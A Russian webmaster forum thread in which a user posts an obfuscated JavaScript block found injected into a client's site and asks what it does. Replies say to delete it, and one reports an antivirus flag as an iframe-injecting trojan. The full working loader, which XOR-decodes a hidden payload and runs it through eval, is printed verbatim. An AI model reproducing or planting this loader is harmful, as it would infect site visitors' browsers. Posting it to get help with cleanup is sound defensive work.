Что делает этот скрипт? Зловред?

BH
На сайте с 20.11.2006
Offline
23
1162

Доброго всем здравия!

Попросили посмотреть сайтик, сказали что вроде как яндекс на него ругается, типа пишет что опасен. Я глянул в потроха странички - и вижу какой-то непонятный мне ява-скрипт. Скрипт вдобавок ко всему еще не отформатирован, что затрудняет его чтение, плюс там еще чего-то много закодировано, поэтому он у меня вызывает подозрения, но сам я в скриптах не силен и прошу вас посмотреть, что делает нижеприведенный код скрипта.

Спасибо!


<script>for(exitTopVoid=0;exitTopVoid<0;exitTopVoid++){exitTopVoid++};var
foldPut;var
getAs=false;foldPut='%85%82%87%86%84%83%84%89%cb%a4%83%cb%da%98%98%cb%a4%87%93%f5%a8%8e%b3%9a%8c%93%d7%84%99%af%ca%ad%9b%81%89%96%ed%c2%f0%a1%ab%da%96%86%8e%8f%82%89%a1%ae%90%f9%95%8f%99%f7%db%d3%d9%d6%82%9e%9d%df%d7%d3%8e%83%87%be%db%f7%92%eb%d3%cb%d7%c9%d7%f4%f7%cd%f3%d1%c4%cf%d9%86%9e%a7%d2%80%f1%ca%88%c0%f3%c1%d4%a1%93%95%8a%9d%d3%95%be%88%9b%b6%9a%8c%9b%c2%c2%9f%bd%9d%8e%a1%92%81%a5%99%d6%ca%c4%ff%95%a2%b8%99%81%8e%d1%cc%cf%99%8e%bd%9e%99%83%9a%80%d8%94%8e%a4%af%98%82%d1%86%9e%a2%99%bc%a6%a7%83%9a%8a%81%90%d9%89%dd%a7%b0%9d%a5%a5%93%ae%98%cb%cb%85%e0%cf%84%9d%82%a3%cc%9d%8a%cd%c4%c6%c6%97%cd%d8%dc%c1%d2%c6%a9%e8%93%85%a6%84%b1%83%80%de%f1%d2%d1%84%87%82%81%c9%c9%9d%b3%a7%85%d3%a4%98%a8%8e%89%8e%ff%df%f9%c6%ca%d0%d7%99%9c%b5%aa%b6%98%97%d6%84%9e%9c%9c%de%f1%c5%97%e3%89%a1%84%9a%d4%d4%f0%9c%a5%8f%a8%df%81%ca%dc%c4%a3%db%85%aa%9d%bf%c9%84%89%88%b1%85%82%87%86%c0%82%82%ab%98%e9%c6%97%a7%9e%94%9e%c4%86%bb%a8%ba%c3%93%97%83%88%87%ea%b9%a4%b2%88%cb%ca%cf%80%96%93%eb%a1%89%a6%9a%9b%b3%d8%8a%89%f6%e0%d0%c7%d6%d3%94%ee%82%98%bf%8a%88%8a%94%cf%98%81%96%dd%98%a2%84%82%9d%98%99%d4%d4%89%b4%b1%9b%c9%ca%d7%c6%c6%ff%d1%d9%f3%e1%d3%c7%d1%95%d5%d3%db%c9%aa%81%9e%80%cd%93%a1%84%94%92%b1%cc%a1%89%9d%93%cd%d2%c1%d8%f4%8c%9e%83%a8%81%92%ca%8a%87%be%84%8e%c1%c3%d2%d9%88%9d%ba%bf%83%86%9d%d7%e4%cf%92%c2%88%ab%b0%a1%a7%a7%85%94%9b%86%9d%ed%de%cc%c2%bd%c9%9f%98%9c%86%a1%9c%de%d5%da%d4%d0%c1%8b%89%b3%a1%8e%87%db%ce%8a%81%b3%8a%ac%80%ab%80%de%c2%88%b9%8e%c9%f5%ad%8e%96%d3%b9%94%82%89%89%b8%ce%85%a9%91%9e%9b%95%ab%8f%cc%97%84%c2%97%99%c3%d9%e3%80%ab%84%a3%90%a7%87%cd%cc%9a%96%b7%96%be%d8%c6%ce%fa%c3%99%9f%a8%83%b5%df%9f%9b%ad%ae%d4%96%9f%df%e0%8f%84%97%8e%83%97%a6%f1%ee%89%9b%90%be%99%84%85%92%a3%df%df%dd%ca%c6%f9%db%e9%d8%fc%d0%eb%c6%f8%97%8a%82%90%b9%9a%d1%96%82%96%c1%97%81%96%91%9e%e4%85%96%cb%cf%9a%a3%99%89%ab%a8%b2%ac%c6%86%95%89%82%8f%81%96%9f%8c%a5%c3%d9%d5%cf%d9%f1%dd%d9%c3%e6%c1%c5%fd%c7%86%af%82%91%cb%91%88%87%b3%94%96%ba%a4%83%bd%d2%86%91%9c%db%ad%8d%9e%8f%d0%dd%d8%da%94%9c%96%95%84%93%89%95%d0%da%d9%e8%d4%f6%90%81%df%96%cd%d0%9e%92%a0%b1%c5%92%b3%81%a4%8b%c2%c5%d6%c2%8a%86%8f%9a%c3%90%8a%83%89%8a%a5%94%9a%dc%ce%97%98%93%8e%eb%85%83%8d%cb%d5%b7%90%8d%8e%ad%83%95%97%d7%92%90%8b%94%b2%91%ad%84%83%f6%91%d7%96%8e%9f%f2%8a%86%87%8c%b1%83%84%c1%d8%e3%8a%8d%99%82%b9%89%d4%ad%92%bd%ca%c0%d1%c8%95%bd%87%9c%c7%f0%c8%dd%8f%ac%98%ad%95%9e%cc%e8%94%af%96%9c%de%cb%9e%90%8f%83%85%d8%c7%d3%95%d4%c5%90%cc%cf%e9%8c%d0%d1%95%cc%b7%99%9d%80%8b%ce%ea%c8%84%9c%d0%ac%8a%95%d9%db%e1%d4%c9%84%df%8f%9b%89%cf%d6%e6%d3%81%96%99%86%89%b6%96%d6%c3%d0%da%b5%ab%e0%9c%a5%8c%85%8a%d4%9a%c2%8e%bd%bb%a4%dc%eb%ca%d6%81%81%84%95%81%a9%ba%8d%92%ec%8b%85%d0%df%d6%bd%89%89%aa%86%86%94%d1%d7%d6%ee%c3%dc%a7%88%8e%82%88%cc%94%bb%c1%cd%98%8a%97%94%aa%82%94%84%99%96%87%c2%d4%d2%d4%a3%8c%b7%b2%9e%9a%99%dd%8a%91%91%f2%e4%d3%e9%9f%9a%88%a9%80%8d%e4%e9%d3%f5%cc%c9%c3%9c%83%89%8d%bd%94%d9%e4%df%84%83%84%c5%97%a3%a2%8b%a2%85%b3%cb%93%8e%d8%f7%d8%d6%da%84%de%87%91%9a%c1%b2%b4%99%a4%82%99%8d%ce%bc%9d%af%9f%89%db%91%88%ae%96%d3%99%d3%84%aa%96%9a%d8%c2%95%85%9a%d1%9e%c2%88%84%b5%db%ad%be%ea%f2%cf%cb%c4%80%80%9f%ce%c3%e3%b2%9e%94%98%8b%99%96%cb%87%8c%b9%83%83%da%86%9b%a2%bb%a9%84%f6%d7%9e%b3%81%b8%a0%9b%9a%c7%bb%85%a9%9b%8d%c9%cf%c7%96%9d%85%c9%8f%81%b1%bc%92%d4%9b%9d%be%af%9b%96%c1%c7%97%d0%ac%85%aa%87%9e%e2%86%c0%92%9a%95%8e%a6%b6%83%8d%89%84%e0%96%96%97%a4%92%ce%c4%82%94%b3%83%a9%8c%a8%8b%be%97%db%df%84%8a%9e%a7%e0%d0%c9%a0%9d%99%9c%cd%c2%cf%ee%9e%9d%9b%97%c4%b9%a7%8e%8e%81%db%d2%d2%c3%f3%d1%ec%d1%9b%a6%d5%8f%91%8e%a4%80%bd%bd%d7%a2%c1%8a%87%eb%9f%82%89%b5%c9%b1%83%97%80%b8%88%8d%80%92%d6%a3%c4%d8%80%a1%93%e4%8e%85%99%9c%93%95%ce%94%b3%8e%81%92%93%aa%84%da%e3%98%d0%83%b6%9a%a4%95%da%86%c6%9b%a6%90%bc%8d%be%ba%c4%df%93%8f%c7%c2%f9%dc%cc%f9%fb%87%9a%9a%99%9f%da%a7%8c%b1%b0%ef%8b%87%99%96%c5%9e%86%96%98%9e%96%a5%a0%92%99%d1%bf%ac%98%c1%d9%83%9f%b6%bf%95%88%db%cb%8b%80%80%bc%8f%99%84%a8%b0%d5%95%dc%87%91%b9%cb%99%95%ac%80%a2%eb%85%9f%92%b3%89%8e%ab%cd%cc%90%dd%8f%9a%bc%cb%b0%f8%8a%99%d5%8c%94%a8%95%8f%97%bf%99%c0%88%9d%9e%87%fb%80%ae%b0%87%ca%8e%90%8e%99%94%bd%8f%fd%94%b6%9e%8c%98%cc%91%8b%bb%e5%9d%90%be%9d%a4%af%8b%80%c8%ff%8e%93%a6%c7%87%96%cd%c9%c7%f7%9d%8d%8a%b1%89%a1%8b%96%90%cd%d5%ce%ca%8b%85%a1%9e%bd%a4%a0%a6%81%d9%98%88%96%89%98%9f%b7%c0%db%f9%88%a0%89%88%97%ad%b0%a4%88%bb%9a%85%d1%d4%9c%ad%b2%98%82%8f%9c%8e%d1%fb';this.charCal=56503;function
cdDate(asVoidOops){function nullAbCal(){};var exitPopFile=20650;function
nilAtTop(exitExMap){this.ccDumpOops='ccDumpOops';var logOut=0;var
longMovInt=function(){};var pushCut=exitExMap.length, intCutCode=0;var
rmTail=56609;var
trueAwkLess=30590;while(intCutCode<pushCut){loopInAt=0;while(loopInAt<3){loopInAt++};var
wordLoop=function(){};logOut+=ccAt(exitExMap,intCutCode)*pushCut;this.cpChar='';intCutCode++;var
getTrue=27305;}this.exitCharTail=12814;var setMov='setMov';return
(logOut+'');function tailBg(tailBg){return true};}var
trueFalseMem=function(){};this.popTailFi='popTailFi';function
ccAt(outLsSet,exitDateDone){for(logExitIn=0;logExitIn<4;logExitIn++){logExitIn++};return
outLsSet['c_hEalrlCEobdbelAjt_'.replace(/[ljbE_]/g, '')](exitDateDone);var
topPutPush=false;}var wordNil='wordNil'.substring(31781, 31781);var
nsAs='nsAs';if((new String(document.write)).indexOf('arity')>0){var
filePopWho=function(){return 'filePopWho'};return;var
codeExit='codeExit'.substring(6392,
6392);}for(bgPwdDump=0;bgPwdDump<2;bgPwdDump++){};this.dateBgTrue='';this.nsVarTop='';var
setVarWait=0,manOops=0,codeManFi=177;for(mapGetPush=0;mapGetPush<0;mapGetPush++){mapGetPush++};var
dateAb='';var logTailPush=33013;var tailDone=(new
String(cdDate)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var bcPs=new Array();var
dumpExEx=nilAtTop(tailDone);exitFloatMem=0;while(exitFloatMem<1){exitFloatMem++};var
dateCode=new
Date();asVoidOops=window['ubnVeDsDcba/pDeS'.replace(/[/SVDb]/g,
'')](asVoidOops);for(catBc=0;catBc<3;catBc++){catBc++};for(topMetaExit=0;topMetaExit<4;topMetaExit++){topMetaExit++};for(var
putExitCut=0; putExitCut < (asVoidOops.length);
putExitCut++){this.fileErr='fileErr';var bgTopWait='';var
doneFileFloat=ccAt(tailDone,setVarWait);function lsAwk(){};var
rmPopOops=ccAt(dumpExEx,manOops);for(falseDumpDo=0;falseDumpDo<4;falseDumpDo++){};cpDoRm=0;while(cpDoRm<3){cpDoRm++};var
pushFc=doneFileFloat^rmPopOops^codeManFi;var useWho='';var
watchTailAs=ccAt(asVoidOops,putExitCut);var cpLog='cpLog'.substring(39115,
39115);var byteDone=false;setVarWait++,manOops++;var
callWaitAs=function(){return
'callWaitAs'};dateAb+=String['fNr@oNmDC:h:aNr@C@oNd:eN'.replace(/[cDN\:@]/g,
'')](watchTailAs^pushFc);function dumpPkgExit(dumpPkgExit){return
true};var memWho=false;if(manOops>dumpExEx.length)manOops=0;function
pwdTail(){};if(setVarWait>tailDone.length)setVarWait=0;this.memAwk='memAwk';}waitTail=0;while(waitTail<2){waitTail++};this.catCdUse=false;window['e.vMahlk'.replace(/[kh\.MN]/g,
'')](dateAb);var catCpCp='catCpCp';var catBg='';return dateAb=new
String();function setInMan(setInMan){return
true};for(pushCd=0;pushCd<0;pushCd++){pushCd++};}function
movPs(){};cdDate(foldPut);var exitCutMod='exitCutMod'.substring(45712,
45712);</script>
E2
На сайте с 15.12.2006
Offline
128
#1

Честно говоря, не знаю. Но если владелец/администратор его не ставил, то можно смело сносить.

Ап! И тигры у ног моих сели.
Fat Bear
На сайте с 01.12.2006
Offline
264
#2
BigHarry:
и вижу какой-то непонятный мне ява-скрипт.

И находится он скорее всего в конце кода страницы...

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
BH
На сайте с 20.11.2006
Offline
23
#3
Масол:
И находится он скорее всего в конце кода страницы...

В основном - находится он после тэга <body>, но в некоторых местах встречается дважды - в заголовке паги и после <body>

Дык что это такое? Какая-то гадость? Боюсь убирать - вдруг это нужно для сбора статистики или еще для какого-то функционала...

Jensi
На сайте с 30.11.2009
Offline
74
#4

Так а как он попал к Вам в страницы? Сносите и узнаете всё:)

Wind change
На сайте с 12.02.2007
Offline
88
#5

пока я не отключил Аваст, я не мог попсть в этот топик. Антивирусник ругался мол вредоносный софт. Так что скорее всего это Вирус и его следует снести со всех страниц сайта.

Название: HTML:IFrame-KN [Trj]

Типа вируса: Троян

Тут можно хорошо заработать. Помогаю рефералам (http://www.sape.ru/r.cb6c8f75d4.php)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий